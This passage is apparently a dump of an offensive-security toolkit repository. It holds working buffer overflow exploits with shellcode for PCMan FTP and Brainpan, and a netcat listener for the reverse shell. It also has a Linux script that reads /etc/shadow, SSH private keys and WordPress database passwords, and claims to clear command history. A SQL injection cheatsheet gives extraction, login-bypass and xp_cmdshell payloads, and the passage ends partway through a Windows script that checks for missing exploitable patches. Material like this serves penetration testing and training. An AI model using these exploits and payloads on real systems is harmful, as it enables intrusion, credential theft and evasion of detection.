"\x89\x7d\x0b\xd6\xc8\x16\x4e\xd8\xcf\xdf\xc7\x3e" 65 | payload += "\xa5\x0f\x8e\xe9\x52\xa9\x8b\x61\xc2\x36\x06\x0c" 66 | payload += "\xc4\xbd\xa5\xf1\x8b\x35\xc3\xe1\x7c\xb6\x9e\x5b" 67 | payload += "\x2a\xc9\x34\xf3\xb0\x58\xd3\x03\xbe\x40\x4c\x54" 68 | payload += "\x97\xb7\x85\x30\x05\xe1\x3f\x26\xd4\x77\x07\xe2" 69 | payload += "\x03\x44\x86\xeb\xc6\xf0\xac\xfb\x1e\xf8\xe8\xaf" 70 | payload += "\xce\xaf\xa6\x19\xa9\x19\x09\xf3\x63\xf5\xc3\x93" 71 | payload += "\xf2\x35\xd4\xe5\xfa\x13\xa2\x09\x4a\xca\xf3\x36" 72 | payload += "\x63\x9a\xf3\x4f\x99\x3a\xfb\x9a\x19\x4a\xb6\x86" 73 | payload += "\x08\xc3\x1f\x53\x09\x8e\x9f\x8e\x4e\xb7\x23\x3a" 74 | payload += "\x2f\x4c\x3b\x4f\x2a\x08\xfb\xbc\x46\x01\x6e\xc2" 75 | payload += "\xf5\x22\xbb" 76 | 77 | #----------------------------# 78 | # Buffer Structure # 79 | #----------------------------# 80 | # buffer = AAA...........AAA # 81 | # buffer = EIP # 82 | # buffer = NOPSled # 83 | # buffer = payload # 84 | # buffer = BBB...........BBB # 85 | #----------------------------# 86 | 87 | buffer = "A" * 2007 88 | buffer += struct.pack('" +W 107 | subprocess.call(['nc -lnvp 1337'], shell=True) 108 | 109 | except Exception,msg: 110 | 111 | print R+ "[-]" + P+ " Could not connect to PCMan FTP Server" + Y+ " (._.)" +W 112 | sys.exit(0) 113 | 114 | -------------------------------------------------------------------------------- /Exploits/Brainpan_v1.0.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #---------------------------------------------------------------------------------------------# 3 | # Software = Brainpan.exe version 1.0 # 4 | # Download Link = https://www.vulnhub.com/entry/brainpan-1,51/# # 5 | # Date = 8/31/2017 # 6 | # Author = @ihack4falafel # 7 | # Tested on = Windows XP SP3 - Professional | Ubuntu 12.10 (Quantal Quetzal) # 8 | # EIP Offset = 524 # 9 | # Badchars = "\x00" # 10 | # RET Address = 311712F3 "\xFF\xE4" | [brainpan.exe] # 11 | # Usage = python exploit.py # 12 | #---------------------------------------------------------------------------------------------# 13 | 14 | import sys 15 | import socket 16 | import struct 17 | import time 18 | 19 | if len(sys.argv) < 3: 20 | print "Usage : python exploit.py " 21 | print "Example : python exploit.py 127.0.0.1 0 | Windows XP" 22 | print " python exploit.py 192.168.127.139 1 | Ubuntu 12.10" 23 | sys.exit(0) 24 | 25 | HOST = sys.argv[1] 26 | PLATFORM = sys.argv[2] 27 | 28 | if PLATFORM is "0": 29 | print "[+] Selecting calc.exe payload for Windows XP.." 30 | time.sleep(1) 31 | 32 | #------------------------------------------------------------------------------# 33 | # msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v payload # 34 | #------------------------------------------------------------------------------# 35 | 36 | payload = "" 37 | payload += "\xbe\x32\x12\xe1\xfa\xda\xdd\xd9\x74\x24\xf4\x58" 38 | payload += "\x29\xc9\xb1\x31\x31\x70\x13\x83\xc0\x04\x03\x70" 39 | payload += "\x3d\xf0\x14\x06\xa9\x76\xd6\xf7\x29\x17\x5e\x12" 40 | payload += "\x18\x17\x04\x56\x0a\xa7\x4e\x3a\xa6\x4c\x02\xaf" 41 | payload += "\x3d\x20\x8b\xc0\xf6\x8f\xed\xef\x07\xa3\xce\x6e" 42 | payload += "\x8b\xbe\x02\x51\xb2\x70\x57\x90\xf3\x6d\x9a\xc0" 43 | payload += "\xac\xfa\x09\xf5\xd9\xb7\x91\x7e\x91\x56\x92\x63" 44 | payload += "\x61\x58\xb3\x35\xfa\x03\x13\xb7\x2f\x38\x1a\xaf" 45 | payload += "\x2c\x05\xd4\x44\x86\xf1\xe7\x8c\xd7\xfa\x44\xf1" 46 | payload += "\xd8\x08\x94\x35\xde\xf2\xe3\x4f\x1d\x8e\xf3\x8b" 47 | payload += "\x5c\x54\x71\x08\xc6\x1f\x21\xf4\xf7\xcc\xb4\x7f" 48 | payload += "\xfb\xb9\xb3\xd8\x1f\x3f\x17\x53\x1b\xb4\x96\xb4" 49 | payload += "\xaa\x8e\xbc\x10\xf7\x55\xdc\x01\x5d\x3b\xe1\x52" 50 | payload += "\x3e\xe4\x47\x18\xd2\xf1\xf5\x43\xb8\x04\x8b\xf9" 51 | payload += "\x8e\x07\x93\x01\xbe\x6f\xa2\x8a\x51\xf7\x3b\x59" 52 | payload += "\x16\x07\x76\xc0\x3e\x80\xdf\x90\x03\xcd\xdf\x4e" 53 | payload += "\x47\xe8\x63\x7b\x37\x0f\x7b\x0e\x32\x4b\x3b\xe2" 54 | payload += "\x4e\xc4\xae\x04\xfd\xe5\xfa\x66\x60\x76\x66\x47" 55 | payload += "\x07\xfe\x0d\x97" 56 | 57 | #----------------------------# 58 | # Buffer Structure # 59 | #----------------------------# 60 | # buffer = AAA...........AAA # 61 | # buffer = EIP # 62 | # buffer = NOPSled # 63 | # buffer = payload # 64 | # buffer = BBB...........BBB # 65 | #----------------------------# 66 | 67 | buffer = "A" * 524 68 | buffer += struct.pack(' " 139 | print "Example : python exploit.py 127.0.0.1 0 | Windows XP" 140 | print " python exploit.py 192.168.127.139 1 | Ubuntu 12.10" 141 | sys.exit(0) 142 | 143 | -------------------------------------------------------------------------------- /BASH/LinuxPrivCheck.sh: -------------------------------------------------------------------------------- 1 | 2 | #---------------------------------------------------------------------------------# 3 | # Name = Linux Quick n' Dirty Privilege Escalation Check Script # 4 | # Reference = https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ # 5 | # Author = @ihack4falafel # 6 | # Date = 12/17/2017 # 7 | # Usage = chmod +x LinuxPrivCheck.sh && ./LinuxPrivCheck.sh # 8 | #---------------------------------------------------------------------------------# 9 | 10 | echo " " 11 | echo -e "\e[35m#----------------------------------#" 12 | echo -e "\e[35m# \e[36m OS Information \e[35m #" 13 | echo -e "\e[35m#----------------------------------#" 14 | echo " " 15 | echo -e "\e[39m" 16 | uname -a # Kernel Version 17 | cat /etc/issue # Distribution 18 | cat /etc/*release # OS Release 19 | echo " " 20 | echo -e "\e[35m#----------------------------------#" 21 | echo -e "\e[35m# \e[36m Network Information \e[35m #" 22 | echo -e "\e[35m#----------------------------------#" 23 | echo " " 24 | echo -e "\e[39m" 25 | cat /etc/resolv.conf # Nameservers 26 | cat /etc/hosts # Hosts 27 | route -n # Route Info. 28 | iptables -L # Firewall Rules 29 | cat /etc/network/interfaces # Network Interfaces 30 | echo " " 31 | echo -e "\e[35m#----------------------------------#" 32 | echo -e "\e[35m# \e[36m Password Information \e[35m #" 33 | echo -e "\e[35m#----------------------------------#" 34 | echo " " 35 | echo -e "\e[39m" 36 | echo -e "\e[34m" 37 | echo "----------|Password File|-----------" 38 | echo " " 39 | echo -e "\e[39m" 40 | cat /etc/passwd 41 | echo " " # Password File 42 | echo -e "\e[39m" 43 | echo -e "\e[34m" 44 | echo "-----------|Shadow File|------------" 45 | echo " " 46 | echo -e "\e[39m" 47 | cat /etc/shadow # Shadow File 48 | echo " " 49 | echo -e "\e[34m" 50 | echo " " 51 | echo "------------|SSH Keys|--------------" 52 | echo " " 53 | echo -e "\e[39m" 54 | cat /root/.ssh/authorized_keys # Authorized SSH Keys 55 | cat /root/.ssh/known_hosts # SSH Known Hosts 56 | cat ~/.ssh/id_rsa # RSA Keys 57 | cat ~/.ssh/id_dsa # DSA Keys 58 | cat /etc/ssh/ssh_host_dsa_key # Alernative DSA keys 59 | cat /etc/ssh/ssh_host_rsa_key # Alternative RSA Keys 60 | echo " " 61 | echo -e "\e[35m#----------------------------------#" 62 | echo -e "\e[35m# \e[36m Misc. Information \e[35m #" 63 | echo -e "\e[35m#----------------------------------#" 64 | echo " " 65 | echo -e "\e[39m" 66 | echo -e "\e[34m" 67 | echo "------|Important Executables|-------" 68 | echo -e "\e[39m" 69 | echo " " 70 | which wget # Check Wget 71 | which nc # Check Nc 72 | which netcat # Check Netcat 73 | which python # Check Python 74 | which python3 # Check Python3 75 | which gcc # Check GCC 76 | which perl # Check Perl 77 | echo -e "\e[34m" 78 | echo " " 79 | echo "-----------|Sudoers File|-----------" 80 | echo " " 81 | echo -e "\e[39m" 82 | cat /etc/sudoers # Check Sudoers 83 | echo -e "\e[34m" 84 | echo " " 85 | echo "--------------|Users|---------------" 86 | echo " " 87 | echo -e "\e[39m" 88 | cat /etc/passwd | cut -d: -f1 # List Users 89 | echo -e "\e[34m" 90 | echo " " 91 | echo "-------------|Groups|---------------" 92 | echo " " 93 | echo -e "\e[39m" 94 | cat /etc/group # Check Groups 95 | echo -e "\e[34m" 96 | echo " " 97 | echo "-----------|SUID Files|-------------" 98 | echo " " 99 | echo -e "\e[39m" 100 | find / -type f -perm -u=s -exec ls -la {} + 2>/dev/null # Check SUID Files 101 | echo -e "\e[34m" 102 | echo " " 103 | echo "-----------|GUID Files|-------------" 104 | echo " " 105 | echo -e "\e[39m" 106 | find / -type f -perm -g=s -exec ls -la {} + 2>/dev/null # Check GUID Files 107 | echo -e "\e[34m" 108 | echo " " 109 | echo "-----------|NO ROOT SQUASH|---------" 110 | echo " " 111 | echo -e "\e[39m" # check no_root_squash 112 | if [ $(cat /etc/exports 2>/dev/null | grep no_root_squash | wc -c) -ne 0 ] 113 | then 114 | echo "NO_ROOT_SQUASH FOUND! " && cat /etc/exports | grep no_root_squash 115 | else 116 | echo "NO_ROOT_SQUASH NOT FOUND!" 117 | fi 118 | echo -e "\e[34m" 119 | echo " " 120 | echo "----------------|EXIM|--------------" 121 | echo " " 122 | echo -e "\e[39m" # Check exim 123 | if [ $(which exim | wc -c) -ne 0 ] 124 | then 125 | echo -n "EXIM FOUND! " && exim -bV | grep version 126 | else 127 | echo "EXIM NOT FOUND!" 128 | fi 129 | echo -e "\e[34m" 130 | echo " " 131 | echo "-------------|CHKROOTKIT|-----------" 132 | echo " " 133 | echo -e "\e[39m" # Check chkrootkit 134 | if [ $(which chkrootkit | wc -c) -ne 0 ] 135 | then 136 | echo -n "CHKROOTKIT FOUND! " && chkrootkit -V 137 | else 138 | echo "CHKROOTKIT NOT FOUND!" 139 | fi 140 | echo -e "\e[34m" 141 | echo " " 142 | echo "-------------|MySQL Creds|-----------" 143 | echo " " 144 | echo -e "\e[39m" # Check MySQL Creds 145 | if [ $(find / -iname wp-config.php 2>/dev/null | wc -c) -ne 0 ] 146 | then 147 | echo "WP-CONFIG.PHP FOUND! " && cat $(locate wp-config.php) | grep DB_NAME && cat $(locate wp-config.php) | grep DB_USER && cat $(locate wp-config.php) | grep DB_PASSWORD 148 | else 149 | echo "WP-CONFIG.PHP NOT FOUND!" 150 | fi 151 | echo -e "\e[34m" 152 | echo " " 153 | echo "--------------|FSTab|---------------" 154 | echo " " 155 | echo -e "\e[39m" 156 | cat /etc/fstab # Check Fstab 157 | echo -e "\e[34m" 158 | echo " " 159 | echo "---------|Daily Cron Jobs|----------" 160 | echo " " 161 | echo -e "\e[39m" 162 | ls -la /etc/cron.d/ # Check Cron Jobs 163 | ls -la /etc/cron.daily/ # Alternative Check Cron Jobs 164 | echo -e "\e[34m" 165 | echo " " 166 | echo "-------------|Crontab|--------------" 167 | echo " " 168 | echo -e "\e[39m" 169 | cat /etc/crontab # Check Crontab 170 | echo -e "\e[34m" 171 | echo " " 172 | echo "------|World Writable Folders|------" 173 | echo " " 174 | echo -e "\e[39m" 175 | find / -perm -222 -type d 2>/dev/null # World Wireable Folders 176 | echo -e "\e[34m" 177 | echo " " 178 | echo "-----------|Home Directory|---------" 179 | echo " " 180 | echo -e "\e[39m" 181 | ls -ahl /home/ 2>/dev/null # Check Home Directory 182 | echo " " 183 | touch ~/.bash_history # Clear Command History 184 | echo " " 185 | echo -e "\e[35m#----------------------------------#" 186 | echo -e "\e[35m# \e[36m Script has been completed! \e[35m #" 187 | echo -e "\e[35m#----------------------------------#" 188 | echo " " 189 | echo -e "\e[39m" 190 | 191 | -------------------------------------------------------------------------------- /Documents/SQL Injection Cheatsheet.md: -------------------------------------------------------------------------------- 1 | #### SQL Injection Cheatsheet 2 | This cheatsheet should NOT be conbsiderd as reference but guide to built on, some of the examples below will require modification(s) such as url encode, comments, etc. Before we contiune here is couple good to know SQL functions 3 | 4 | ```php 5 | limit , # display rows based on offset and number 6 | 7 | count(*) # display number of rows 8 | 9 | rand() # generate random number between 0 and 1 10 | 11 | floor(rand()*) # print out number part of random decimal number 12 | 13 | select(select database()); # double query (nested) using database() as an example 14 | 15 | group by # summerize rows based on column name 16 | 17 | concat(, , ..) # concatenate strings such as tables, column names 18 | 19 | length() # calculate the number of characters for given string 20 | 21 | substr(,,) # print string character(s) by providing offset and length 22 | 23 | ascii() # decimal representation of the character 24 | 25 | sleep() # go to sleep for 26 | 27 | if(,,) # conditional if statement 28 | 29 | like "%" # checks if provided string present 30 | 31 | outfile "" # dump output of select statement into a file 32 | 33 | load_file("") # dump the content of file 34 | ``` 35 | Now comes the fun part, here's combination of error, union, blind SQL command injection examples. 36 | 37 | Determine back-end query number of columns with error-based string SQL command injection 38 | ```php 39 | http://meh.com/index.php?id=1 order by 40 | ``` 41 | 42 | Determine back-end query number of columns by observing `http response size` with `wfuzz` in error-based integer SQL command injection 43 | ```php 44 | wfuzz -c -z range,1-10 "http://meh.com/index.php?id=1 order by FUZZ" 45 | ``` 46 | 47 | Identify webpage printable union columns by providing false value to back-end query with error-based integer SQL command injection. This injection depends on number of columns identified by `order by` clause 48 | ```php 49 | http://meh.com/index.php?id=-1 union select 50 | ``` 51 | 52 | Dump the content of table into the filesystem 53 | ```php 54 | http://meh.com/index.php?id=-1')) union select , from into outfile "" --+ 55 | ``` 56 | 57 | Print back-end SQL version with error-based integer SQL command injection, assuming column 3 content gets diplayed on webpage 58 | ```php 59 | http://meh.com/index.php?id=-1 union select 1,2,@@version,4,... 60 | ``` 61 | 62 | Print user running the query to access back-end database server with error-based integer SQL command injection 63 | ```php 64 | http://meh.com/index.php?id=-1 union select 1,2,user(),4,... 65 | ``` 66 | 67 | Print database name with error-based integer SQL command injection 68 | ```php 69 | http://meh.com/index.php?id=-1 union select 1,2,database(),4,... 70 | ``` 71 | 72 | Print database directory with error-based integer SQL command injection 73 | ```php 74 | http://meh.com/index.php?id=-1 union select 1,2,@@datadir,4,... 75 | ``` 76 | 77 | Print table names with error-based integer SQL command injection 78 | ```php 79 | http://meh.com/index.php?id=-1 union select 1,2,group_concat(table_name),4,... from information_schema.tables where table_schema=database() 80 | ``` 81 | 82 | Print column names with error-based integer SQL command injection 83 | ```php 84 | http://meh.com/index.php?id=-1 union select 1,2,group_concat(column_name),4,... from information_schema.columns where table_name='

' 85 | ``` 86 | 87 | Print content of column with error-based integer SQL command injection 88 | ```php 89 | http://meh.com/index.php?id=-1 union select 1,2,group_concat(),4,... from

90 | ``` 91 | 92 | Use `and` statement as substitute to reqular comments such as `--+`, `#`, and `/* */` with error-based string SQL command injection 93 | ```php 94 | http://meh.com/index.php?id=1' and '1 95 | ``` 96 | Determine databsae name with boolean-based blind SQL injection with `substr()` 97 | ```php 98 | http://meh.com/index.php?id=1' and (substr(database(),,))='' --+ 99 | ``` 100 | 101 | Determine databsae name with boolean-based blind SQL injection by observing `http response size` with combination of `substr()` and `wfuzz`, assuming database name does not include special characters 102 | ```php 103 | for i in $(seq 1 10); do wfuzz -c -z list,a-b-c-d-e-f-g-h-i-j-k-l-m-n-o-p-q-r-s-t-u-v-w-x-y-z --hw= "http://meh.com/index.php?id=1' and (substr(database(),$i,1))='FUZZ' --+";done 104 | ``` 105 | Determine databsae name with boolean-based blind SQL injection by observing `http response size` with `substr()`, `ascii()` and `wfuzz`. The below range is the standard ASCII characters (32-127) 106 | ```php 107 | for i in $(seq 1 10); do wfuzz -c -z range,32-127 --hw= "http://meh.com/index.php?id=1' and (ascii(substr(database(),$i,1)))=FUZZ --+";done 108 | ``` 109 | 110 | Determine table name with boolean-based blind SQL injection by observing `http response size` with `substr()`, `ascii()`, and `wfuzz`.The below range is the standard ASCII characters (32-127) 111 | ```php 112 | for i in $(seq 1 10); do wfuzz -c -z range,32-127 --hw= "http://meh.com/index.php?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),$i,1)))=FUZZ --+";done # increment limit first argument by 1 to get the next available table name 113 | ``` 114 | 115 | Determine column name with boolean blind-based SQL injection by observing `http response size` with `substr()`, `ascii()`, and `wfuzz`. The below range is the standard ASCII characters (32-127) 116 | ```php 117 | for i in $(seq 1 10); do wfuzz -c -z range,32-127 --hw= "http://meh.com/index.php?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name=

limit 0,1),$i,1)))=FUZZ --+";done # increment limit first argument by 1 to get the next available column name 118 | ``` 119 | Boolean-based blind SQL command injection demo 120 | 121 | ![alt text](https://j.gifs.com/W77p8o.gif) 122 | 123 | Confirm time-based blind SQL injection using `sleep()` function 124 | ```php 125 | http://meh.com/index.php?id=1' and sleep(10) --+ 126 | ``` 127 | 128 | Determine database version with time-based blind SQL injection using `sleep()`, `like""`, and conditional `if`, assuming the back-end database is running version 5 129 | ```php 130 | http://meh.com/index.php?id=1' and if((select version()) like "5%", sleep(10), null) --+ 131 | ``` 132 | 133 | Determine database name with time-based blind SQL injection by observing `http response time` with `substr()`, `ascii()`, and `wfuzz`.The below range is the standard ASCII characters (32-127) 134 | ```php 135 | for i in $(seq 1 10); do wfuzz -v -c -z range,32-127 "http://meh.com/index.php?id=1' and if((ascii(substr(database(),$i,1)))=FUZZ, sleep(10), null) --+";done > && grep "0m9" 136 | ``` 137 | 138 | Determine table name with time-based blind SQL injection by observing `http response time` with `substr()`, `ascii()`, `if`, and `wfuzz`.The below range is the standard ASCII characters (32-127) 139 | ```php 140 | for i in $(seq 1 10); do wfuzz -v -c -z range,32-127 "http://meh.com/index.php?id=1' and if((select ascii(substr(table_name,$i,1))from information_schema.tables where table_schema=database() limit 0,1)=FUZZ, sleep(10), null) --+";done > && grep "0m9" # increment limit first argument by 1 to get the next available table name 141 | ``` 142 | Determine column name with time-based blind SQL injection by observing `http response time` with `substr()`, `ascii()`, `if`, and `wfuzz`.The below range is the standard ASCII characters (32-127) 143 | ```php 144 | for i in $(seq 1 10); do wfuzz -v -c -z range,32-127 "http://meh.com/index.php?id=1' and if((select ascii(substr(column_name,$i,1))from information_schema.columns where table_name='

' limit 0,1)=FUZZ, sleep(10), null) --+";done > && grep "0m9" # increment limit first argument by 1 to get the next available column name 145 | ``` 146 | 147 | Extract column content with time-based blind SQL injection by observing `http response time` with `substr()`, `ascii()`, `if`, and `wfuzz`.The below range is the standard ASCII characters (32-127) 148 | ```php 149 | for i in $(seq 1 10); do wfuzz -v -c -z range,0-10 -z range,32-127 "http://meh.com/index.php?id=1' and if(ascii(substr((select from

limit FUZZ,1),$i,1))=FUZ2Z, sleep(10), null) --+";done > && grep "0m9" # change to get the content of next column 150 | ``` 151 | Time-based blind SQL command injection with bash magic demo 152 | 153 | ![alt text](https://j.gifs.com/2vv2J1.gif) 154 | 155 | Hope those were helpfull! Now here's couple login bypass commands that worked for me 156 | ```php 157 | meh' OR 3=3;# 158 | meh' OR 2=2 LIMIT 1;# 159 | meh' OR 'a'='a 160 | meh' OR 1=1 --+ 161 | ``` 162 | Sometimes you'll run into Microsoft SQL server that have `xp_cmdshell` turned on, here's syntax for remote code execution 163 | ```php 164 | meh' exec master..xp_cmdshell '' -- 165 | ``` 166 | 167 | Final notes! 168 | - If you made it this far then you know that most of the SQL command injection examples are based on `MySQL` and I don't plan on making any for `MSSQL` cause I'm lazy 169 | - Use your proxy of choice to bypass client-side javascript restrictions 170 | - `order by` clause works only with regular comments such as `--+` 171 | - Update ASCII range to include special characters if you're going after users table 172 | - `MySQL` don't have permissions to overwrite an exsisting file, make sure you go with new filename every single time with `outfile`. 173 | - Make sure the vulnerable paramater have false value when working with union-based SQL command injection 174 | - It's worth noting that all of the examples in this cheatsheet where http `GET` requests, and it shouldn't be that hard to replicate them with http `POST`requests once you grasp the core concepts. 175 | - You need to input true value to the vulnerable paramter for `and sleep()` to work, otherwise go with `or sleep()`. Here's an example for the sake of clarification 176 | ```php 177 | http://meh.com/index.php?id=' and sleep(1) # 178 | http://meh.com/index.php?id=' or sleep(1) # 179 | ``` 180 | To do list 181 | - Python or bash script to convert ascii to text after data extraction (grep output in this case) 182 | - Create outfile && loadfile templates 183 | 184 | -------------------------------------------------------------------------------- /Windows/WinPrivCheck.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | rem #---------------------------------------------------------------------------------# 4 | rem # Name = Windows Privilege Escalation Check v1.0 # 5 | rem # Reference = http://www.fuzzysecurity.com/tutorials/16.html # 6 | rem # Author = @ihack4falafel # 7 | rem # Date = 9/18/2017 # 8 | rem # Tested On = Windows XP SP3 - Professional # 9 | rem # Windows 7 SP1 - Entrprise # 10 | rem # Windows 10 - Professional # 11 | rem # Usage = WinPrivCheck.bat # 12 | rem # Requirements = accesschk.exe(old version) - sysinternals # 13 | rem #---------------------------------------------------------------------------------# 14 | 15 | 16 | @echo off 17 | rem Used rem instead of echo for cleaner output. 18 | @echo on 19 | 20 | rem #----------# 21 | rem # Hostname # 22 | rem #----------# 23 | 24 | @echo off 25 | 26 | hostname 27 | 28 | @echo on 29 | 30 | rem #----------# 31 | rem # Username # 32 | rem #----------# 33 | 34 | @echo off 35 | 36 | echo %username% 2>NUL 37 | whoami 2>NUL 38 | echo %userprofile% 2>NUL 39 | 40 | @echo on 41 | 42 | rem #-----------# 43 | rem # OS Verion # 44 | rem #-----------# 45 | 46 | @echo off 47 | 48 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 49 | 50 | @echo on 51 | 52 | rem #--------------------# 53 | rem # Installed Software # 54 | rem #--------------------# 55 | 56 | @echo off 57 | 58 | wmic product get Name, Version 59 | 60 | @echo on 61 | 62 | rem #-----------------# 63 | rem # Available Users # 64 | rem #-----------------# 65 | 66 | @echo off 67 | 68 | net users 69 | 70 | @echo on 71 | 72 | rem #----------------# 73 | rem # Network Config # 74 | rem #----------------# 75 | 76 | @echo off 77 | 78 | ipconfig /all 79 | 80 | @echo on 81 | 82 | rem #--------------# 83 | rem # Route Config # 84 | rem #--------------# 85 | 86 | @echo off 87 | 88 | route print 89 | 90 | @echo on 91 | 92 | rem #-----------# 93 | rem # ARP Cache # 94 | rem #-----------# 95 | 96 | @echo off 97 | 98 | arp -a 99 | 100 | @echo on 101 | 102 | rem #---------------------# 103 | rem # Network Connections # 104 | rem #---------------------# 105 | 106 | @echo off 107 | 108 | netstat -ano 109 | 110 | @echo on 111 | 112 | rem #-------------------# 113 | rem # Firewall Settings # 114 | rem #-------------------# 115 | 116 | @echo off 117 | 118 | netsh firewall show state 119 | netsh firewall show config 120 | 121 | @echo on 122 | 123 | rem #------------------# 124 | rem # Running Services # 125 | rem #------------------# 126 | 127 | @echo off 128 | 129 | net start 130 | 131 | @echo on 132 | 133 | rem #------------------------# 134 | rem # Local PrivEsc Exploits # 135 | rem #------------------------# 136 | 137 | @echo off 138 | 139 | rem Given this script is for all versions of Windows, I'd reference the results with the below matrix to avoid false postives. 140 | 141 | 142 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 143 | rem # Exploits Index | 2K | XP | 2K3 | 2K8 | Vista | 7 | Title | 144 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 145 | rem # KB2592799 | MS11-080 | X | SP3 | SP3 | X | X | X | afd.sys - Local privilege Escalation | 146 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 147 | rem # KB3143141 | MS16-032 | X | X | X | SP1/2 | SP2 | SP1 | Secondary Logon - Local privilege Escalation | 148 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 149 | rem # KB2393802 | MS11-011 | X | SP2/3 | SP2 | SP2 | SP1/2 | SP0 | WmiTraceMessageVa - Local privilege Escalation | 150 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 151 | rem # KB982799 | MS10-059 | X | X | X | ALL | ALL | SP0 | Chimichurri - Local privilege Escalation | 152 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 153 | rem # KB979683 | MS10-021 | SP4 | SP2/3 | SP2 | SP2 | SP0/1/2 | SP0 | Windows Kernel - Local privilege Escalation | 154 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 155 | rem # KB2305420 | MS10-092 | X | X | X | SP0/1/2 | SP1/2 | SP0 | Task Scheduler - Local privilege Escalation | 156 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 157 | rem # KB981957 | MS10-073 | X | SP2/3 | SP2 | SP2 | SP1/2 | SP0 | Keyboard Layout - Local privilege Escalation | 158 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 159 | rem # KB4013081 | MS17-017 | X | X | X | SP2 | SP2 | SP1 | Registry Hive Loading - Local privilege Escalation | 160 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 161 | rem # KB977165 | MS10-015 | ALL | ALL | ALL | ALL | ALL | ALL | User Mode to Ring - Local privilege Escalation | 162 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 163 | rem # KB941693 | MS08-025 | SP4 | SP2 | SP1/2 | SP0 | SP0/1 | X | win32k.sys - Local privilege Escalation | 164 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 165 | rem # KB920958 | MS06-049 | SP4 | X | X | X | X | X | ZwQuerySysInfo - Local privilege Escalation | 166 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 167 | rem # KB914389 | MS06-030 | ALL | SP2 | X | X | X | X | Mrxsmb.sys - Local privilege Escalation | 168 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 169 | rem # KB908523 | MS05-055 | SP4 | X | X | X | X | X | APC Data-Free - Local privilege Escalation | 170 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 171 | rem # KB890859 | MS05-018 | SP3/4 | SP1/2 | X | X | X | X | CSRSS - Local privilege Escalation | 172 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 173 | rem # KB842526 | MS04-019 | SP2/3/4 | X | X | X | X | X | Utility Manager - Local privilege Escalation | 174 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 175 | rem # KB835732 | MS04-011 | SP2/3/4 | SP0/1 | X | X | X | X | LSASS service BoF - Remote Code Execution | 176 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 177 | rem # KB841872 | MS04-020 | SP4 | X | X | X | X | X | POSIX - Local Privilege Escalation | 178 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 179 | rem # KB2975684 | MS14-040 | X | X | SP2 | SP2 | SP2 | SP1 | afd.sys Dangling Pointer - Local Privilege Escalation | 180 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 181 | rem # KB3136041 | MS16-016 | X | X | X | SP1/2 | SP2 | SP1 | WebDAV to Address - Local Privilege Escalation | 182 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 183 | rem # KB3057191 | MS15-051 | X | X | SP2 | SP2 | SP2 | SP1 | win32k.sys - Local Privilege Escalation | 184 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 185 | rem # KB2989935 | MS14-070 | X | X | SP2 | X | X | X | TCP/IP - Local Privilege Escalation | 186 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 187 | rem # KB2503665 | MS11-046 | X | SP3 | SP2 | SP1/2 | SP1/2 | SP1 | 'afd.sys' - Local Privilege Escalation | 188 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 189 | 190 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2592799" | find /i "KB2592799" 1>NUL 191 | IF not errorlevel 1 ( 192 | 193 | echo MS11-080 patch is installed :( 194 | 195 | ) ELSE ( 196 | 197 | echo MS11-080 patch is NOT installed! 198 | 199 | ) 200 | 201 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3143141" | find /i "KB3143141" 1>NUL 202 | IF not errorlevel 1 ( 203 | 204 | echo MS16-032 patch is installed :( 205 | 206 | ) ELSE ( 207 | 208 | echo MS16-032 patch is NOT installed! 209 | 210 | ) 211 | 212 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802" | find /i "KB2393802" 1>NUL 213 | IF not errorlevel 1 ( 214 | 215 | echo MS11-011 patch is installed :( 216 | 217 | ) ELSE ( 218 | 219 | echo MS11-011 patch is NOT installed! 220 | 221 | ) 222 | 223 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB982799" | find /i "KB982799" 1>NUL 224 | IF not errorlevel 1 ( 225 | 226 | echo MS10-059 patch is installed :( 227 | 228 | ) ELSE ( 229 | 230 | echo MS10-059 patch is NOT installed! 231 | 232 | ) 233 | 234 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979683" | find /i "KB979683" 1>NUL 235 | IF not errorlevel 1 ( 236 | 237 | echo MS10-021 patch is installed :( 238 | 239 | ) ELSE ( 240 | 241 | echo MS10-021 patch is NOT installed! 242 | 243 | ) 244 | 245 | wmic qfe get 